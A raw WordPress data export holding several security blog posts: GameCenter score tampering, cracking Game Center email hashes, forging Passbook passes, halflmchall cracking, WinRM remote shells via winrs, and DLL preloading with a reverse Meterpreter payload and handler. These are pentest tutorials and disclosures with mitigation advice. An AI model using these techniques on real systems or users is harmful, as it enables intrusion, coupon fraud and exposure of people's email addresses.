      1. They may know more about the cards and multi-GPU setups.
  5. Don’t get discouraged if your setup isn’t working.
    1. We didn’t get it right on the first try, but we eventually got there.
Check out GPU Cracking: Setting up the Server by Eric Gruber on how to configure your cracking box to see all of the cards and run the cracking software. [post_title] => GPU Cracking: Building the Box [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-building-the-box [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:44 [post_modified_gmt] => 2021-04-13 00:05:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1166 [menu_order] => 400 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [48] => WP_Post Object ( [ID] => 1170 [post_author] => 10 [post_date] => 2013-03-18 07:00:09 [post_date_gmt] => 2013-03-18 07:00:09 [post_content] => I recently wrote a blog post about cracking email hashes from the iOS GameCenter application. During my research on the issue, I noticed that there were a number of games where users had insanely high scores. Lots of the users also had the exact same score (9,223,372,036,854,775,807) for each of the games that they played. Coincidentally, this number is the largest possible signed 64-bit integer value that you can have. It turns out that getting these high scores isn't that hard to do.

Setup

In order to modify our scores, we will need to proxy our iOS traffic through Burp. To properly intercept the encrypted iOS traffic, you will also need to install the Portswigger certificate on your iOS device. At this point, you will want your Burp listener to be on the same wireless network as your iOS device. You also need to have your Burp listener set to listen on all interfaces to allow your iOS device to proxy through it. The iOS proxy settings are fairly easy to set up. Just enter your Wi-Fi settings, tap on the blue and white arrow-in-a-circle (to the right of your SSID), and scroll down to your HTTP Proxy settings. Set the server IP to your Burp listener and set your port to the Burp listener port. Visit an HTTPS website on your iOS device to see if the Portswigger certificate is properly installed. If you don’t have any issues (or SSL warnings), you should be ready to go.

Modifying Scores

Once your iOS device is properly proxying traffic through your Burp listener, you will want to generate a score to post to GameCenter. For most games, this is not very hard to do. We will be using “Cut the Rope” as our example. Open up the first level, set Burp to intercept traffic, and complete the level (you cut one rope, it’s really easy). At this point you will see the “Level Complete” screen on your iOS device and the following request will come through Burp.
POST /WebObjects/GKGameStatsService.woa/wa/submitScores HTTP/1.1
Host: service.gc.apple.com
User-Agent: gamed/4.10.17.1.6.13.5.2.1 (iPhone4,1; 6.1.2; 10B146; GameKit-781.18)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Accept: */*
Some-Cookies: have been removed to make this shorter
Content-Type: application/x-apple-plist
Connection: keep-alive
Proxy-Connection: keep-alive
x-gk-bundle-version: 2.1
Content-Length: 473
x-gk-bundle-id: com.chillingo.cuttherope
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>scores</key>
    <array>
        <dict>
            <key>category</key>
            <string>1432673794</string>
            <key>context</key>
            <integer>0</integer>
            <key>score-value</key>
            <integer>12345</integer>
            <key>timestamp</key>
            <integer>1361998342937</integer>
        </dict>
    </array>
</dict>
</plist>
If you are seeing other requests come through, just forward them and keep your eye out for the request for the “submitScores” page. Before forwarding the score on to Apple, you will want to modify the score. The highest possible value that you can submit is 9,223,372,036,854,775,807. Replace the “score-value” integer in the plist (12345 in the example above) with 9223372036854775807 and forward the request. You should receive a “status 0” response from Apple, and your score will be updated in GameCenter.
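If you would rather script the modification than edit the body by hand, the intercepted plist can be handled with Python’s built-in plistlib. Here is a rough sketch; the saved request body file is a placeholder for whatever you pulled out of Burp.

import plistlib

body = open("intercepted_request_body.plist", "rb").read()  # placeholder: saved request body
payload = plistlib.loads(body)

for score in payload["scores"]:
    score["score-value"] = 9223372036854775807  # the maximum submittable score

print(plistlib.dumps(payload).decode())  # paste this back over the request body in Burp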

Conclusion

I don’t intend on modifying my high scores for each of my GameCenter games. I really don’t care that much about the scores, but some people do. Given Apple’s current model for GameCenter leaderboards, this may not be an easy fix. At a minimum, Apple may want to do some checking on these high scores to weed out any of the users that are maxing out their top scores. For now, I’m going to put the iPhone down and get some work done.
[post_title] => Hacking High Scores in iOS GameCenter [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-high-scores-in-ios-gamecenter [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:30 [post_modified_gmt] => 2021-06-08 21:51:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1170 [menu_order] => 403 [post_type] => post [post_mime_type] => [comment_count] => 16 [filter] => raw ) [49] => WP_Post Object ( [ID] => 1174 [post_author] => 10 [post_date] => 2013-02-11 07:00:09 [post_date_gmt] => 2013-02-11 07:00:09 [post_content] =>

Lately I've been looking at iOS. After looking into the Passbook application, I started poking around with the iOS Game Center application. The iOS Game Center allows iOS users to connect with friends, play games, and compare scores for their games. Think of it as Xbox Live for iOS.

Each Game Center user has an alias (or nickname, handle, etc.), a first and last name, and an email address tied to their account (also tied to their Apple ID). A user’s alias is publicly accessible by all Game Center users. The user’s first and last names are provided if they are shown in the “Friend Recommendations” feature or if they share a mutual friend with another user. If an email address is tied to an account, a SHA1 hash of the email address might also be accessible. Sometimes there’s more than one email address tied to an account, so multiple hashes will be returned when the account information is queried. Finally, each user has a playerID in the format of G:145811274 (my ID). This is the unique identifier used by Game Center to identify an account. I was only able to see this identifier while intercepting traffic.

For this attack, I proxied all of my traffic through the Burp Suite proxy. This allowed me to easily capture (and replay) all of the requests that Game Center was making to Apple servers. I did have to install the Portswigger CA certificate on my iPhone to intercept the SSL traffic. The prime targets for data enumeration were the “Friend Recommendations” and the friends of my friends list.

Since I wasn't really using Game Center, I had to add some friends. I started by gathering all of the playerIDs for everyone in my recommended friends. This list appeared to be populated by recommendations based on the people that I follow on Twitter and my Facebook friends. I also pulled down the top 150 users from the leader boards to add to my list as well. I intercepted an add request with Burp, moved the request into the Intruder function, and used my list of playerIDs (~250 IDs total) to automate the friend request process. After adding several friends (~20), I requested that Game Center send me a list of all of the friends of my friends. I then added them to the list of people to friend request. I should also note that requesting over 500 people as friends will probably result in your iPhone/iPad/etc. exploding in notifications of friend approvals.

I should note here that it would be very easy to set up a script to run once a day, to pull down a list of friends of friends and automatically friend request everyone that is one hop away from me. 


Leader board listings


Listing of Friend Recommendations and the "Friends of a Friend" list

Attack

If you haven’t figured it out yet, the inference attack that I will demonstrate has to do with guessing the email address from the SHA1 hash. Since we already have an alias or handle for the user, along with the person’s first and last name, it’s not a long stretch for us to try and guess the email address(es) tied to their iTunes account. After enumerating all of the information available for my recommended friends and next-hop friends (friends of my friends), I wrote a quick PowerShell script to read the data and generate potential email addresses.

Considering most people (that I know) use some variation of their name or a handle for their email address, it was pretty easy to generate variations to use for guessing. In order to test multiple email domains, I appended each variation with hundreds of popular email address domains. Below is a sample of the potential email user names that I tested:

  • kfosaaen@example.com 
  • k.fosaaen@example.com 
  • karlfosaaen@example.com 
  • karl.fosaaen@example.com 
  • karl.f@example.com
  • karlf@example.com 

After generating the potential emails, I then created SHA1 hashes of these email addresses and compared them to the hashes in the collected data. The script I used is really simple and may not have any practical use for you, but I put it out on GitHub: https://github.com/kfosaaen/EmailGenerator
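The generate-hash-compare loop is simple enough to sketch in a few lines of Python (the linked EmailGenerator script is PowerShell; the names, domains, and target hash below are placeholders rather than real collected data):

import hashlib

first, last, alias = "karl", "fosaaen", "kfosaaen"                    # known profile data
domains = ["example.com", "gmail.com", "yahoo.com"]                   # shortened domain list
target_hash = hashlib.sha1(b"karl.fosaaen@example.com").hexdigest()   # demo target hash

candidates = [first + last, first + "." + last, alias,
              first + "." + last[0], first + last[0], last + first[0]]

for name in candidates:
    for domain in domains:
        email = "%s@%s" % (name, domain)
        if hashlib.sha1(email.encode()).hexdigest() == target_hash:
            print("Matched email: " + email)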

After I wrote the PowerShell script, I realized that I could just use HashCat to do the generation (and some brute forcing) for me. I just used the generated emails as my dictionary and some custom rules to help with the address guessing.

Results

By the end of my data collection, I had attempted to add over five hundred people as friends on Game Center. If you happened to be one of those people, I’m sorry. Overall, I was able to add 174 new friends to my Game Center account. Thanks to those friends, I was able to collect 1,635 records of Game Center ID, Alias, Email Hash, and Full Names. I actually stopped collecting records after I hit 45 friends, but I’m sure that I could get many more at this point. Those records also had to be pared down to remove special characters in user names, so the final list came out to 1,534 records. Of those, I was able to crack three hundred (19.5%) of the email addresses in about seven minutes.

This was all done over the course of about four days. Given more time and a better script for generating potential email addresses, I think that the percentage would be a lot higher for the collected email addresses. I did stop the attack at the point where I felt that I had a good proof-of-concept, as I really didn't care to harvest a ton of emails. I have been in contact with Apple about this since January 10th, so they've had a fair amount of time to deal with the issue on their end.

Conclusion

I know this isn't a groundbreaking attack that exposes tons of sensitive user data, but it’s important to note that if a piece of data is important enough to hash, it should be hashed well. It should also not be available to all users. From an attacker’s perspective, having this information would be very valuable to anyone trying to attack a specific iTunes account. If you’re a Game Center user, you can protect your info by turning off the “Public Profile” feature in the Game Center settings.

In order to fix the issue, Apple should consider the business need for returning SHA1 hashes of user email addresses. I don’t know what the hashes are currently being used for on the iPhone side, but there may be a need for them. If they are needed, then Apple should be salting these hashes to reduce the risk of an attacker cracking them.

[post_title] => Know Your Opponent – an Inference Attack Against iOS Game Center [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => know-your-opponent-an-inference-attack-against-ios-game-center [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:27 [post_modified_gmt] => 2021-06-08 21:51:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1174 [menu_order] => 407 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [50] => WP_Post Object ( [ID] => 1180 [post_author] => 10 [post_date] => 2012-12-12 07:00:09 [post_date_gmt] => 2012-12-12 07:00:09 [post_content] => With the release of iOS 6, Apple introduced the Passbook application. Currently there are sixteen different applications that support Passbook integration. The purpose of the Passbook application is to provide a one-stop application to manage all of your coupons, loyalty/gift cards, and tickets/boarding passes. This all sounds great, but what happens when an attacker abuses this service to get discounts or to access other people’s gift cards? This blog will show you how easy it is to intercept Passbook passes, modify them, and redeploy them to the Passbook application. The Passbook passes are typically generated by applications at the user’s request. The user tells the application that they want their coupon/ticket/etc. in their Passbook and the application calls out to its Passbook server. At this point, the Passbook server generates the pass and sends it back to the app to pass on to the user.

How can we break it?

Now there are already multiple services available that will generate Passbook passes for you. I’m not going to cover those here, as they have their own ways of creating passes and that’s not what we’re looking to do. In this blog, you’ll see how you can intercept a Passbook .pkpass file from the source and modify it for your own uses.

How to intercept the pass

The easiest way to intercept the Passbook URLs and/or files is by using a proxy. I have Burp Proxy set up on a laptop to intercept web traffic from my iPhone. Once you identify the Passbook request URLs (assuming the application uses HTTP for requests), you can easily replay the request (in a browser) from the intercepting host to get the .pkpass file. Additionally, you could sniff out wireless traffic from your wireless network and identify Passbook requests.

Deconstructing the .pkpass

Plain and simple, .pkpass files are zip files. All you have to do to access the internal files is unzip the file. Once unzipped, the three required files contained in the .pkpass folder are:
  • manifest.json (generated by Apple’s signpass tool)
  • pass.json (contains the Passbook pass data)
  • signature (a signature file for integrity)
Additional image files may be in the folder to be used by the pass (icon.png, thumbnail.png, strip.png), but those are all considered optional. If you are looking at an intercepted pass file, you will most likely find additional images used for the pass. The most interesting file is the pass.json file. A sample of the pass.json:
{ "passTypeIdentifier":"pass.com.ACME. MobileCoupon", "formatVersion":1, "organizationName":"ACME Corporation", "serialNumber":"ABCDX-12345", "teamIdentifier":"A9BKD012", "logoText": "", "description":"ACME coupons.", "webServiceURL":"https://PASSBOOKServer.com/passbook/", "authenticationToken":"123456789123456789123456789", "suppressStripShine" : 1, ], "locations":[ {"latitude" : 44.989893, "longitude" : -93.279087} ]
Here are the important parts that you need to modify if you’re going to regenerate your own pass (there’s a short scripted example after this list).
  • passTypeIdentifier - This will later be changed to your identifier (see below)
  • teamIdentifier - This will also get changed to yours (also see below)
  • webServiceURL - You may just want to remove this one (otherwise the pass may phone home for updates)
  • authenticationToken - You may also want to delete this as well (it’s not going to get used by anything)
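Since a .pkpass is just a zip archive, the unpack-and-edit step is easy to script. Below is a rough Python sketch of that step (the file names and identifiers are placeholders); re-signing still has to happen with Apple’s signpass tool and your own Pass Type ID certificate, as described in the next section, and the old signature and manifest.json files need to be deleted before you re-sign.

import json
import zipfile

with zipfile.ZipFile("intercepted.pkpass") as pk:   # placeholder file name
    pk.extractall("intercepted_pass")

with open("intercepted_pass/pass.json") as f:
    pass_data = json.load(f)

pass_data["passTypeIdentifier"] = "pass.com.yourcompany.yourpass"  # your Pass Type ID
pass_data["teamIdentifier"] = "YOURTEAMID"                         # your team identifier
pass_data.pop("webServiceURL", None)        # keep the pass from phoning home for updates
pass_data.pop("authenticationToken", None)  # not used once the web service URL is gone

with open("intercepted_pass/pass.json", "w") as f:
    json.dump(pass_data, f, indent=2)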

How to create your own passes with signpass

At this point, I’m going to assume that you’re using a Mac to generate your passes. You can do this from Windows, but it’s a little more complicated (and a possible future blog post). Get yourself an iOS developer account with Apple. It’s $99 and you actually get some interesting stuff with it (assuming you’re into iOS). Once you have an account, you need to create a “New Pass Type ID” from the iOS Provisioning Portal. This pass type ID will be used by the pass.json file as the passTypeIdentifier and the teamIdentifier. You can follow the steps on Apple’s site to create the ID. Open the “configure” action on the Pass Type ID page and download the pass certificate. Once you download your certificate, install it to your OS X keychain and you should be good to sign your own passes. The Apple developers site has the Passbook SDK available that contains the signpass application for generating .pkpass files. The SDK actually provides several example passes that you can generate on your own for testing. In order to generate the actual .pkpass files, you will need to compile the signpass application in Xcode (the project is in the SDK files). This can be a pain if you’re not familiar with Xcode. Basically, you build the application in Xcode, click on “Products” (on the left), right-click on signpass, and click “Show in Finder.” This will bring you to the compiled application, where you can copy it out to your Passbook directory. Once you’ve compiled the signpass application, you can use it to generate the manifest.json and signature files. The application will also zip all the files into the .pkpass file. You can use your intercepted file that you unzipped earlier, but you will want to delete the signature and manifest.json files before you try and recreate the .pkpass file. You will also want to modify the pass.json parameters (passTypeIdentifier and teamIdentifier) to match the certificate you just downloaded from Apple. Finally, since you’re working on a Mac, you need to delete any .DS_Store files that get created in your .pkpass folder. If there is a .DS_Store file in the folder and it isn’t caught by the manifest.json file, your pass will not be valid on the phone. Here’s an example of the .pkpass creation:
NetSPIs-MacBook-Pro:netspi NetSPI$ ./signpass -p NetSPI.raw/
2012-11-12 15:00:04.512 signpass[945:707] {
    "icon.png" = 575b58cc687b853935c63e800a63547a9c54572f;
    "icon@2x.png" = dbfca47b69c6f0c7fc452b327615bc98d7732d33;
    "logo.png" = d360269292d8cfe37f5566bba6fb643d012bef84;
    "logo@2x.png" = cdd3c98dd3044fe3d82bcea0cca944242cdcc6bf;
    "pass.json" = f72d3d597c7fc9d1f2132364609d32c9890de458;
    "strip.png" = b9f823da6eefc83127b68f0ccca552514803ed1f;
    "strip@2x.png" = 319991c69de365c0d2a8534e0997aea01f08d3eb;
    "thumbnail.png" = a68cc65e48febb6e603682d057d4e997da64a6a5;
    "thumbnail@2x.png" = 7ec0e3c38225fea3a5b0dbb36d7712c27b8b418f;
}

Sending passes via email or web

The easiest way to deploy your newly created pass is through email. A properly signed .pkpass file should show up in your iOS mailbox as a Passbook pass without any issue. Additionally, .pkpass files can be downloaded from a web server that has support for serving .pkpass files.


Conclusions

The primary risk that I see with intercepting Passbook files is fraud. Someone could potentially modify a pass to try and get a discount at a store, or maybe gain access to someone else’s rewards account. This can easily be stopped by using strong controls on the business’s side, but there’s always a risk of social engineering. For those developing Passbook integration for their applications, make sure all of your pass files are sent over securely encrypted channels and ensure that your business has strong controls to prevent tampering with Passbook passes. For those that would like a copy of the NetSPI pass shown above, email me karl.fosaaen@netspi.com. [post_title] => Hacking Passbook, the Real Way to do Extreme Couponing [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-passbook-the-real-way-to-do-extreme-couponing [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:24 [post_modified_gmt] => 2021-06-08 21:51:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1180 [menu_order] => 416 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [51] => WP_Post Object ( [ID] => 1184 [post_author] => 10 [post_date] => 2012-11-09 07:00:09 [post_date_gmt] => 2012-11-09 07:00:09 [post_content] => Frequently during penetration tests, we will capture halflmchall password hashes from the network. These can come from a variety of sources, but common sources include NBNS spoofing and SQL queries/SQL injection. Both methods can be easy ways to get halflmchall hashes during a pen test. For those who are unfamiliar with halflmchall hashes and how they are created, the process is pretty simple. When a client makes an authentication request with a server, the server responds with a challenge (which is basically a seed value used for hashing) for the client to use. If we are acting as the server, we can specify the challenge and the authentication protocol that we want to use. If we have a static challenge (1122334455667788) and a weak authentication protocol (LANMAN v1), we’re able to quickly look up the captured hashes in rainbow tables. Now, this isn’t the full technical detail of the process, but hopefully this gives you a good idea as to how this can work to our advantage. For a much more in-depth review of the process, here’s a great write up  - http://www.foofus.net/?page_id=63 The typical capture to cracked password process goes like this:
  1. Obtain a man-in-the-middle position, or force a server to authenticate to your evil server.
  2. Capture the hash (via SMB or HTTP servers).
  3. Look up the first 16 characters of the captured LM hash in the HalfLMChall rainbow tables.
  4. Use the cracked portion of the LM hash to feed into the John the Ripper netntlm.pl script to crack the rest of the LM hash.
  5. Feed the case insensitive password (from step 3) back into the netntlm.pl script to crack the case sensitive NTLM hash and get the full password.
The cracking process goes pretty quickly, but it does require running multiple commands, which includes some copy and paste work. I’ve found that this process takes up more of my time than I would like, so I wrote a PowerShell script to automate the whole cracking process.

PowerShell cracking script requirements:

  1. The halflmchall rainbow tables
  2. Rcracki_mt
  3. John the Ripper (Jumbo release)
  4. Perl (required to run netntlm.pl)
  5. You will also need to enable PowerShell to run scripts: “Set-ExecutionPolicy RemoteSigned”
Within the script you will have to specify your John, rcrack, Perl, and rainbow table locations, but you should be able to run the script from any directory. The script usage is simple:
PS_MultiCrack.ps1 Input_File Output_File
You should be able to use the john formatted output file generated from the metasploit modules, but below is the basic format that the script will require:
Domain\User:::LMHASH:NTLMHASH:1122334455667788
Example\TestAdmin:::daf4ce8f1965961138e76ee328e595e0c0c2d9a83fbe83fb:211af68207f7c88a1ad6c103a56966d1da1c1e91f02291f0:1122334455667788
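As a quick illustration of step 3 from the workflow above, the half-LM portion that gets looked up in the rainbow tables is just the first 16 hex characters (8 bytes) of the captured LM response. Here is a small Python sketch of pulling that out of a capture line in the format shown (this is not the PS_MultiCrack.ps1 script, and the line below simply reuses the example data):

line = ("Example\\TestAdmin:::"
        "daf4ce8f1965961138e76ee328e595e0c0c2d9a83fbe83fb:"
        "211af68207f7c88a1ad6c103a56966d1da1c1e91f02291f0:1122334455667788")

user, _, _, lm_resp, ntlm_resp, challenge = line.split(":")
half_lm = lm_resp[:16]  # first 8 bytes of the LM response, hex encoded

print("user: " + user)
print("challenge: " + challenge)
print("half-LM value for the rainbow table lookup: " + half_lm)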
The “1122334455667788” is the default static salt that is used by most of the tools used for capturing the hashes. It’s also the salt used by the rainbow tables (Download here). The script will write out each username and password to the output file when it’s done. Hashes that are already in the john.pot file will be prefixed in your output file as “Previously Cracked:” so that you don’t have to worry about cleaning out your input file as you add more hashes. Additionally, the script won’t go through the effort of cracking the same hash again, as that would be a waste of time. If you have any comments, suggestions, issues, please let me know through here or GitHub and I’ll try to address them. GitHub Repo [post_title] => Automating HalfLMChall Hash Cracking [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => automating-halflmchall-hash-cracking [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:35 [post_modified_gmt] => 2021-04-13 00:05:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1184 [menu_order] => 419 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [52] => WP_Post Object ( [ID] => 1186 [post_author] => 10 [post_date] => 2012-10-29 07:00:09 [post_date_gmt] => 2012-10-29 07:00:09 [post_content] =>

Introduction - What is WinRM?

Windows Remote Management (WinRM) is a SOAP based protocol that can be used to remotely administer machines over the network. This is a handy tool for network admins that can also be used to automate tasks securely across multiple machines. However, it is fairly easy to misconfigure the service and/or abuse the service with legitimate account access.

How to mess up the WinRM configuration

In my personal experience with configuring the WinRM service, I have found it hard to get anything working correctly without completely removing security controls from the configuration. Scale my frustrations up to a domain level and you very quickly have poorly secured configs going out to hosts across a domain. It should be noted that the following commands should not be used for an actual WinRM configuration. These are just examples of the multiple ways that this service can be configured to run insecurely. Quick steps for configuring WinRM insecurely: Note: These are all commands that are run from a command shell with administrative privileges.
  1. Start the WinRM service. The only requirement to start the service is that none of your network interfaces can be set to “Public” in Windows. This typically isn’t an issue in domain environments. The command itself is not really a security issue, it’s just needed to actually run the WinRM service.
     winrm quickconfig
  2. Allow WinRM commands to be accepted through unencrypted channels (HTTP).
     winrm set winrm/config/service @{AllowUnencrypted="true"}
  3. Allow WinRM commands to be sent through unencrypted channels (HTTP).
     winrm set winrm/config/client @{AllowUnencrypted="true"}
  4. Enable “Basic” network authentication for inbound WinRM connections to the server.
     winrm set winrm/config/service/auth @{Basic="true"}
  5. Enable “Basic” network authentication for outbound WinRM client connections. So, when you make a WinRM connection to another host with the local WinRM client, you can authenticate using “Basic” authentication.
     winrm set winrm/config/client/auth @{Basic="true"}
  6. Allow credentials to be relayed out to another host using the CredSSP protocol. This allows the host receiving commands to pass incoming credentials on to another host for authentication.
     winrm set winrm/config/service/auth @{CredSSP="True"}
In order to authenticate against the service remotely, the authenticating account either has to be the same as the service account running the WinRM service, or a member of the local administrators group. This also means that any service set up to run scripted jobs through WinRM has to have access to credentials for a local administrator account.

What can we do with this?

Let’s assume that you have access to a host on a network and you have domain credentials, but there are no escalation points for you to follow on the host. If the WinRM service is set up to listen on other hosts in the domain, you may have the ability to use the service to gain remote access to the other hosts. Let’s say that you want to gain remote access to host 192.168.0.123 on the domain, but RDP is not enabled (or your account does not have RDP access). The open ports 5985 and 5986 (TCP) indicate that the WinRM service may be running on the remote host. You can identify the service with the following command:

winrm identify -r:http://192.168.0.123:5985 -auth:none

The response should look something like this:

IdentifyResponse
    ProtocolVersion = http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
    ProductVendor = Microsoft Corporation
    ProductVersion = OS: 6.1.7601 SP: 1.0 Stack: 2.0

Once you’ve determined the service is running, you can try to run commands against the remote host with the Windows Remote Shell (winrs) command:

winrs -r:http://192.168.0.123:5985 -u:domainname\useraccount "dir c:"

You can also use this with HTTPS on port 5986, as that may be your only option. If you change the “dir c:” to “cmd” you will have a remote shell on the host. That should look something like this:

winrs -r:http://192.168.0.123:5985 -u:domainname\useraccount "cmd"

While the remote shell will only be running under your account’s privileges, there may be other escalation options on your new host.
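The same kind of access can also be scripted. Here is a rough sketch using the third-party pywinrm package (an assumption on my part; the post itself only uses the built-in winrs client), running a single command over the HTTP listener on TCP 5985 with domain credentials. The host, account, and password are placeholders.

import winrm

session = winrm.Session(
    "http://192.168.0.123:5985/wsman",
    auth=("domainname\\useraccount", "Password123"),
)
result = session.run_cmd("whoami")  # any command your account is allowed to run
print(result.status_code)
print(result.std_out.decode(errors="replace"))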

Conclusion

As you can see, the WinRM service can be very powerful and useful for legitimately administering systems on the domain. It also can be used by attackers to work their way through the internal network. With any network service, determine your business need for the service before it is implemented. If the service is needed, then ensure that the service is securely configured before it is deployed. If you’re thinking about using WinRM, make sure that you only allow specific trusted hosts and limit users in your local administrators groups. [post_title] => Exploiting Trusted Hosts in WinRM [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exploiting-trusted-hosts-in-winrm [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:18 [post_modified_gmt] => 2021-04-13 00:05:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1186 [menu_order] => 421 [post_type] => post [post_mime_type] => [comment_count] => 5 [filter] => raw ) [53] => WP_Post Object ( [ID] => 1187 [post_author] => 10 [post_date] => 2012-10-22 07:00:09 [post_date_gmt] => 2012-10-22 07:00:09 [post_content] => DLL preloading (also known as sideloading and/or hijacking) is a common vulnerability in applications. The exploitation of the vulnerability is a simple file write (or overwrite) and then you have an executable running under the context of the application. The vulnerability is fairly easy to identify and even easier to exploit. In this blog, I will be showing you how identify and exploit DLL preloading vulnerabilities, as well as give you tips on how you can protect yourself from these vulnerabilities.

What is it?

DLL preloading happens when an application looks to call a DLL for execution and an attacker provides a malicious DLL to use instead. If the application is not properly configured, the application will follow a specific search path to locate the DLL. The application initially looks at its current directory (the one where the executable is located) for the DLL. If the DLL is not found in this location, the application will then continue on to the current working directory. This can be very helpful if the malicious DLL can be loaded along with a file, as the file and DLL can be accessed by multiple people on a network share. From there it’s on to the system directory, followed by the Windows directory, finally looking in the PATH environmental variable for the DLL. Properly configured applications will require specific paths and/or proper signatures for DLLs in order to use them. If an attacker has write access to the DLL or a location earlier within the search path, they can potentially cause the application to preload their malicious DLL.

How to identify vulnerable DLLs

Personally, I like to use Dependency Walker for static analysis of all of the DLLs that are called by the application. Note that Dependency Walker performs static analysis, so it will not catch DLLs that the application only resolves at runtime. For a more dynamic approach, you can use ProcMon, which identifies vulnerable applications by showing the DLLs they call during runtime. Using ProcMon against NetStumbler, we can see that the application makes multiple calls to the MFC71ENU.DLL file. We identify vulnerable DLLs by the locations they are called from; if a location is controlled by an attacker, the application is potentially vulnerable. Here we can see that NetStumbler (version 0.4.0) is looking for the mfc71enu.dll file in a number of different directories, including the tools directory from which I opened a .ns1 NetStumbler file. This is not a guarantee that the application is vulnerable. The application may use secondary measures (integrity checks) to prevent DLL tampering, but this is at least a good start for trying to attack the application.
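
A quick way to see similar information without a GUI is to dump the modules a running process has actually loaded and where they were loaded from. This sketch uses the NetStumbler process name as a placeholder:

# 'NetStumbler' is a placeholder process name - substitute the process you are testing
Get-Process -Name NetStumbler |
    Select-Object -ExpandProperty Modules |
    Select-Object ModuleName, FileName |
    Sort-Object FileName

# DLLs loading from user-writable locations (the application folder, a network share,
# or the directory of the document you just opened) deserve a closer look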

How to exploit it

Once a vulnerable DLL is identified, the attack is fairly simple.
  1. Craft your malicious DLL with Metasploit (see the note after these steps for current Metasploit syntax):
    1. msfpayload PAYLOAD LHOST=192.168.0.101 LPORT=8443 D > malicious_DLL.dll
      1. PAYLOAD, LHOST, and LPORT are up to you
      2. D denotes that you are creating a DLL payload
  2. Place the replacement DLL in the vulnerable directory and rename it to the name of the vulnerable DLL.
  3. Set up your listener:
    1. Run the Metasploit console
    2. msf > use exploit/multi/handler
    3. msf exploit(handler) > set LHOST 192.168.0.101
    4. msf exploit(handler) > set LPORT 8443
    5. msf exploit(handler) > exploit -j
      1. This will start the listener as a job, allowing you to handle multiple sessions.
  4. Run the application (or open your file with the DLL in the same folder). Once the application makes the call to the vulnerable DLL, the Meterpreter payload will execute. If this is done on a network share, this could have a much greater impact.
  5. Running sessions -l in Metasploit will list the active sessions, and sessions -i (SessionNumber) will let you interact with a chosen session.
For this version of NetStumbler (0.4.0), the application is vulnerable through the mfc71enu.dll file. Below is an example of a malicious DLL placed in the directory of a NetStumbler file. When the TestStuble.ns1 file is opened, the application will use the malicious DLL located in the current directory and create a Meterpreter session.
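
The msfpayload syntax above reflects older Metasploit releases; msfpayload has since been replaced by msfvenom. On a current install, generating an equivalent DLL payload would look roughly like this (the payload name, LHOST, and LPORT simply mirror the earlier example):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=8443 -f dll -o malicious_DLL.dll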

How to fix it or prevent it

DLL preloading can be a helpful attack during a penetration test, but it doesn’t have to be a pain to fix. For application developers:
  • Require fully qualified (explicit) paths when loading DLLs in applications
For system administrators:
  • Disable write permissions to relative application folders
  • Utilize least privilege access to prevent users (and applications) from having too much access to the system
For both groups:

Conclusion

As you can see, DLL preloading is still a common issue in applications. Hopefully this blog gives you some insight into how the attack works and what you can do to lock down your applications to prevent this issue. If you want some examples of vulnerable applications, ExploitDB has a great list.

UPEK + Lenovo = Insecure Password Storage

Recently, Adam Caudill and ElcomSoft identified vulnerabilities in the way that UPEK fingerprint readers store Windows passwords in the registry, and Adam has released a great proof-of-concept tool to decrypt these poorly encrypted passwords. I have access to a Lenovo T420 ThinkPad that features a UPEK fingerprint reader, and its ThinkVantage Fingerprint Software is also vulnerable to this UPEK issue. The issue affects credentials that the user enters in the ThinkVantage Fingerprint Software. Since I do not use the fingerprint reader for Active Directory authentication, I do not regularly update my password in the software, so when I initially ran the decryption tool, it came back with my password from several months ago. For users who regularly use the fingerprint reader for AD authentication, this could be a major issue. If you have this software on your machine and want to keep it, I would recommend the following:
  1. Set a disposable password for your Windows account
  2. Open up the “ThinkVantage Fingerprint Software” (Accessible from the ThinkVantage Client Security Solution menu)
  3. Enter your disposable password in the software and click “Submit”.
  4. Close out the software and only authenticate to the application with your fingerprint.
  5. Once your password has been updated, it may be worth compiling Adam Caudill’s tool to double check that the password has been changed: https://github.com/brandonlw/upek-ps-pass-decrypt
  6. Additionally, you can use the reveal password button to show the current password stored by the application.
  7. Finally, full disk encryption is a good idea, regardless of your use of a fingerprint reader. If someone steals your computer, full disk encryption will prevent them from recovering data (including registry keys) from the hard drive.
Facebook message spoofing via SMTP

